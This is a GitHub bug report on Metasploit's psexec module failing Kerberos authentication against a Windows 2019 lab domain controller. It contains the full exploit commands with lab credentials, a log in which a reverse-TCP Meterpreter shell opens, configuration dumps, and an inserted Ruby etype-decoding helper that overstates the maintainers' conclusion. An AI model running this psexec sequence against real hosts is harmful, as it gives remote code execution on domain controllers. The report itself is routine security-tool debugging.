rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Kerberos authentication not working with psexec on Windows 2019 Domain Controller #18528

Closed jheysel-r7 closed 11 months ago

jheysel-r7 commented 12 months ago

Steps to reproduce

This was reproduced on macOS 13.6.1 and Ubuntu 20.04.3

  1. Promote a Windows 2019 Server (10.0.17763) to a domain controller
  2. Start msfconsole
  3. Do use windows/smb/psexec
  4. Set the following options:
    set rhosts 172.16.199.100
    set SMBDomain demo.local
    set SMBUser Administrator
    set SMBPass N0tpassword!
    set SMB::Auth kerberos
    set Domaincontrollerrhost 172.16.199.100
    set SMB::Rhostname dc1.demo.local
  5. Run the module.
  6. Observe the following error gets raised: https://github.com/rapid7/metasploit-framework/blob/08a2a293a949d31c79e14df387e2d2405c27715d/lib/msf/core/exploit/remote/kerberos/client.rb#L306
    
```
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.100:445 - Connecting to the server...
[*] 172.16.199.100:445 - Authenticating to 172.16.199.100:445|demo.local as user 'Administrator'...
[+] 172.16.199.100:445 - 172.16.199.100:88 - Received a valid TGT-Response
[*] 172.16.199.100:445 - 172.16.199.100:445 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20231109131033_default_172.16.199.100_mit.kerberos.cca_594207.bin
[-] 172.16.199.100:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > set SMB::Auth ntlm
SMB::Auth => ntlm
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.100:445 - Connecting to the server...
[*] 172.16.199.100:445 - Authenticating to 172.16.199.100:445|demo.local as user 'Administrator'...
[*] 172.16.199.100:445 - Selecting PowerShell target
[*] 172.16.199.100:445 - Executing the payload...
[*] Sending stage (175686 bytes) to 172.16.199.100
[+] 172.16.199.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.100:62944) at 2023-11-09 13:11:11 -0500

meterpreter > exit
```

  7. Also note that when `SMB::Auth` is set to `ntlm` with the same `user/pass/rhost/domain` the module succeeds.

### Notes

When watching the module run over the wire, it looks like the encryption type being offered is `eTYPE-AES256-CTS-HMAC-SHA1-96`
![Screenshot 2023-11-10 at 1 04 53 PM](https://github.com/rapid7/metasploit-framework/assets/23320005/5964fc0d-59cc-4636-a5aa-d1a833f39924)

When checking to see what kind of encryption types were supported by the system: 

```
PS C:\Users\Administrator> Get-ADComputer -Filter * -Properties msDS-SupportedEncryptionTypes

DistinguishedName             : CN=DC1,OU=Domain Controllers,DC=demo,DC=local
DNSHostName                   : dc1.demo.local
Enabled                       : True
msDS-SupportedEncryptionTypes : 28
Name                          : DC1
ObjectClass                   : computer
ObjectGUID                    : 8b68b840-8e7a-4d12-a052-ea49e8395534
SamAccountName                : DC1$
SID                           : S-1-5-21-3907774564-2315225553-1676620424-1001
UserPrincipalName             :
```


According to [Decrypting the Selection of Supported Kerberos Encryption Types](https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797), `28` denotes `RC4, AES 128, AES 256`.

```
PS C:\Users\Administrator> systeminfo

Host Name:                 DC1
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00000-00001-AA815
Original Install Date:     11/7/2023, 11:35:23 AM
System Boot Time:          11/9/2023, 1:54:42 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz
                           [02]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2592 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.18452719.B64.2108091906, 8/9/2021
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 555 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 1,494 MB
Virtual Memory: In Use:    1,705 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    demo.local
Logon Server:              \\DC1
Hotfix(s):                 1 Hotfix(s) Installed.
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [02]: fe80::c047:b65f:376f:17f1
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```


## Expected behavior

The module should authenticate to the target via kerberos.

## Current behavior

The module is failing and saying that `KDC has no support for encryption type`.

### Metasploit version

```
Framework: 6.3.38-dev-c855c56235
Console  : 6.3.38-dev-c855c56235
```


##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/database/local_db_service]
url=[Filtered]

[framework/ui/console]
ActiveModule=exploit/windows/smb/psexec

[windows/smb/psexec]
SMBDomain=demo.local
SMBUser=Administrator
SMBPass=N0tpassword!
SMB::Auth=kerberos
SMB::Domaincontroller=172.16.199.100
DomainControllerRhost=172.16.199.100
SMB::Rhostname=dc1.demo.local
RHOSTS=172.16.199.100
loglevel=3
WORKSPACE=
VERBOSE=false
WfsDelay=10
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RPORT=445
SSL=false
SSLServerNameIndication=
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
NTLM::UseNTLMv2=true
NTLM::UseNTLM2_session=true
NTLM::SendLM=true
NTLM::UseLMKey=false
NTLM::SendNTLM=true
NTLM::SendSPN=true
SMB::pipe_evasion=false
SMB::pipe_write_min_size=1
SMB::pipe_write_max_size=1024
SMB::pipe_read_min_size=1
SMB::pipe_read_max_size=1024
SMB::pad_data_level=0
SMB::pad_file_level=0
SMB::obscure_trans_pipe_level=0
SMBDirect=true
SMBName=*SMBSERVER
SMB::VerifySignature=false
SMB::ChunkSize=500
SMB::Native_OS=Windows 2000 2195
SMB::Native_LM=Windows 2000 5.0
SMB::ProtocolVersion=1,2,3
SMB::AlwaysEncrypt=true
KrbCacheMode=read-write
SMB::Krb5Ccname=
SMB::KrbOfferedEncryptionTypes=AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1
SERVICE_NAME=
SERVICE_DISPLAY_NAME=
SERVICE_DESCRIPTION=
SERVICE_PERSIST=false
CMD::DELAY=3
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=auto
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SMBSHARE=
ALLOW_GUEST=false
SERVICE_FILENAME=
PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SERVICE_STUB_ENCODER=
LHOST=172.16.199.158
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
EXITFUNC=thread
PayloadBindPort=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
MeterpreterDebugBuild=false
MeterpreterDebugLogging=
```


</details>

##  Database Configuration

The database contains the following information:
<details>
<summary>Collapse</summary>

Session Type: postgresql selected, no connection


</details>

##  History

The following commands were run during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
1772  use psexec
1773  use 4
1774  options
1775  rhosts 172.16.199.100
1776  set SMBdomain demo.local
1777  set SMBUser Administrator
1778  set SMBPass N0tpassword!
1779  options
1780  set SMB::Auth kerberos
1781  options
1782  set SMB::Domaincontroller
1783  set SMB::Domaincontroller 172.16.199.100
1784  set Domaincontrollerrhost 172.16.199.100
1785  advanced
1786  set SMB::Rhostname dc1.demo.local
1787  run
1788  option
1789  options
1790  set rhosts 172.16.199.100
1791  options
1792  run
1793  set loglevel 3
1794  debug
```


</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[10/11/2023 13:30:06] [e(0)] core: No database definition for environment production
[10/11/2023 13:30:24] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source:
  /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:in `initialize'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `new'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `driver'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
  ./msfconsole:23:in `<main>'
  - ThreadError deadlock; recursive locking
[10/11/2023 13:31:58] [e(0)] core: Module torchserve not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/11/2023 13:34:25] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Interrupt - Interrupt
[11/10/2023 08:45:34] [e(0)] core: No database definition for environment production
[11/10/2023 08:45:55] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source:
  /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:in `initialize'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `new'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `driver'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
  ./msfconsole:23:in `<main>'
  - ThreadError deadlock; recursive locking
[11/10/2023 08:46:00] [e(0)] core: Module psexec not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[11/10/2023 08:48:22] [e(0)] core: rhosts walker invalid - NoMethodError undefined method `scan' for nil:NilClass
[11/10/2023 08:48:35] [e(0)] core: Rex::Proto::Kerberos::Model::Error::KerberosError Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
[11/10/2023 08:48:35] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type - Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
```


</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

msf-ws.log does not exist.


</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
  /home/msfuser/git/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
  /home/msfuser/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1680:in `cmd_sessions'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
  /home/msfuser/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:192:in `cmd_exploit'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/shell.rb:168:in `block in run'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:31:in `with_context'
  /home/msfuser/git/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
  ./msfconsole:23:in `<main>'
[10/06/2023 12:46:41] [e(0)] core: Rex::TimeoutError Send timed out
[10/10/2023 13:01:12] [e(0)] core: No database definition for environment production
[10/10/2023 13:01:12] [d(0)] core: Updated user based module store
[10/10/2023 13:03:29] [e(0)] core: Module pytorch not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/10/2023 13:26:54] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Interrupt - Interrupt
[10/10/2023 16:00:41] [e(0)] core: No database definition for environment production
[10/10/2023 16:01:56] [e(0)] core: Module torchserver not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/10/2023 16:03:10] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[10/10/2023 16:07:09] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Errno::ECONNRESET Connection reset by peer - Errno::ECONNRESET Connection reset by peer
[10/11/2023 13:30:06] [e(0)] core: No database definition for environment production
[10/11/2023 13:30:24] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source:
  /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:in `initialize'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `new'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `driver'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
  ./msfconsole:23:in `<main>'
  - ThreadError deadlock; recursive locking
[10/11/2023 13:31:58] [e(0)] core: Module torchserve not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/11/2023 13:34:25] [e(0)] core: Exploit failed (multi/http/torchserver_cve_2023_43654): Interrupt - Interrupt
[11/10/2023 08:45:34] [e(0)] core: No database definition for environment production
[11/10/2023 08:45:55] [e(0)] core: Thread Exception: ModuleCacheRebuild critical=true source:
  /home/msfuser/git/metasploit-framework/lib/msf/ui/console/driver.rb:168:in `initialize'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `new'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:66:in `driver'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
  /home/msfuser/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
  ./msfconsole:23:in `<main>'
  - ThreadError deadlock; recursive locking
[11/10/2023 08:46:00] [e(0)] core: Module psexec not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[11/10/2023 08:48:22] [e(0)] core: rhosts walker invalid - NoMethodError undefined method `scan' for nil:NilClass
[11/10/2023 08:48:34] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[11/10/2023 08:48:35] [d(0)] core: Negotiated SMB version: SMB3
[11/10/2023 08:48:35] [e(0)] core: Rex::Proto::Kerberos::Model::Error::KerberosError Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
[11/10/2023 08:48:35] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type - Rex::Proto::SMB::Exceptions::LoginError Login Failed: Kerberos Error - KDC_ERR_ETYPE_NOSUPP (14) - KDC has no support for encryption type
```


</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

msf-ws.log does not exist.


</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 6.3.43-dev-6659684fdf
Ruby: ruby 3.0.5p211 (2022-11-24 revision ba5cf0f7c5) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1f 31 Mar 2020
Install Root: /home/msfuser/git/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Git Clone
```



</details>
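An added example (not code from the issue reporter or from the Metasploit project) that decodes the `msDS-SupportedEncryptionTypes` value `28` shown in the notes above and checks it against the `SMB::KrbOfferedEncryptionTypes` list from the datastore, which is the first thing to verify when a KDC answers `KDC_ERR_ETYPE_NOSUPP`. The bit values follow the Microsoft article linked above and the etype numbers RFC 3961; the mapping of those bits to Metasploit's option labels (`AES256`, `RC4-HMAC`, ...) is my assumption.

```ruby
# Added example, not code from the issue or from Metasploit. Decodes the
# msDS-SupportedEncryptionTypes bitmask reported in the issue (28) and checks
# it against the client's SMB::KrbOfferedEncryptionTypes list.

# Bit values of msDS-SupportedEncryptionTypes (per the Microsoft article linked
# in the issue) with the RFC 3961 etype numbers that a packet capture shows.
# The short names match the labels in the issue's datastore (an assumption).
MSDS_ENC_TYPE_BITS = {
  0x01 => { name: 'DES-CBC-CRC', etype: 1 },
  0x02 => { name: 'DES-CBC-MD5', etype: 3 },
  0x04 => { name: 'RC4-HMAC',    etype: 23 },
  0x08 => { name: 'AES128',      etype: 17 }, # aes128-cts-hmac-sha1-96
  0x10 => { name: 'AES256',      etype: 18 }  # aes256-cts-hmac-sha1-96
}.freeze

# DES3-CBC-SHA1 (etype 16) is in the offered list but has no msDS bit: a
# Windows KDC never advertises it, so it can never be the negotiated type.
ETYPE_NUMBERS = MSDS_ENC_TYPE_BITS.values
                                  .to_h { |e| [e[:name], e[:etype]] }
                                  .merge('DES3-CBC-SHA1' => 16).freeze

# Names of the etypes whose bits are set; bits this table does not know are ignored.
def decode_msds_enc_types(value)
  MSDS_ENC_TYPE_BITS.select { |bit, _| (value & bit) != 0 }
                    .values.map { |e| e[:name] }
end

# Offered etypes that the account also advertises, in client preference order.
def negotiable_etypes(msds_value, offered_list)
  supported = decode_msds_enc_types(msds_value)
  offered_list.split(',').map(&:strip).select { |n| supported.include?(n) }
end

# RFC 3961 numbers for an offered list, to compare against the etype field
# Wireshark shows in the AS-REQ/TGS-REQ.
def etype_numbers(offered_list)
  offered_list.split(',').map { |n| ETYPE_NUMBERS.fetch(n.strip) }
end

# One-line diagnosis of KDC_ERR_ETYPE_NOSUPP for one account's bitmask.
def explain_etype_nosupp(msds_value, offered_list)
  common = negotiable_etypes(msds_value, offered_list)
  if common.empty?
    'no overlap between offered and supported etypes: KDC_ERR_ETYPE_NOSUPP ' \
      'is expected; enable a shared etype on the account or on the client'
  else
    "overlap #{common.join(',')}: this account's bitmask does not explain " \
      'KDC_ERR_ETYPE_NOSUPP; compare the etype list actually sent in the ' \
      'TGS-REQ and the msDS-SupportedEncryptionTypes of the service account'
  end
end

if $PROGRAM_NAME == __FILE__
  offered = 'AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1' # from the datastore above
  puts "DC1$ (28) supports: #{decode_msds_enc_types(28).join(', ')}"
  puts explain_etype_nosupp(28, offered)
end
```

For the values in this issue the overlap is `AES256,AES128,RC4-HMAC`, so the DC1$ bitmask alone cannot account for the error, which is consistent with the maintainers' conclusion that a configuration setting rather than the etype list was responsible.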
smcintyre-r7 commented 11 months ago

Closed because we were unable to reproduce this after multiple attempts. We believe the issue may have been related to a configuration setting and thus did not require a code change to the framework.

If the issue comes up again we'll reinvestigate.